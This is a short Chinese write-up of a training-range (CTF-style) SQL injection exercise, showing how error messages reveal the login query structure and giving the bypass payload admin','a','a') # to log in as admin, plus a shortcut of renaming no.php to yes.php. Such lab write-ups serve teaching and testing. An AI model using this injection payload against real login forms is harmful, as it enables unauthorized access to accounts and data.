墨者学院SQL过滤字符后手工绕过漏洞测试(万能口令)

进入靶场环境,看到必须是admin账号登录进去才可以拿到key

构造万能密码语句,尝试报错猜测一下数据库的后端语句结构。

账号:admin'

密码:随便输入

原始语句:select * from users where username = '' and password = ''

结合实际报错,得出实际 查询语句应该为:select * from users where username = 'admin' , 'a' , 'a') and password = ''

所以此时,尝试构造以下语句绕过登录。

账号:admin','a','a') #

密码:随便输入

成功登录获得key

总结:这一个靶场的重点就是教会大家如何从报错中猜解数据库语句结构。

一点投机取巧的方法:如果是在ctf这种抢时间的环境下,直接把no.php改成yes.php就可以成功拿到key了

相关推荐
C澒8 小时前
前端监控系统的最佳实践
前端·安全·运维开发
C澒10 小时前
SGW 接入层运维实战:配置查看 + 监控分析 + 日志排查
前端·安全·运维开发
Noontec10 小时前
铁威马F4-425Plus提供专属于创作者的解决方案
安全·网络存储·铁威马nas
emma羊羊11 小时前
【AI技术安全】
网络·人工智能·安全
赛德传动12 小时前
使用SNJ齿轮齿条升降机时,有哪些安全防护措施?
网络·安全·制造
拍客圈14 小时前
Discuz CC 防护规则
服务器·网络·安全
九河云14 小时前
数字韧性时代,华为云CBR为业务连续性注入“免疫基因”
大数据·人工智能·安全·机器学习·华为云
国科安芯15 小时前
航空级PMSM驱动系统中MCU的故障诊断与容错控制策略研究
单片机·嵌入式硬件·安全·架构·制造·安全性测试
C澒15 小时前
系统初始化成功率下降排查实践
前端·安全·运维开发
只是懒得想了15 小时前
C++实现密码破解工具:从MD5暴力破解到现代哈希安全实践
c++·算法·安全·哈希算法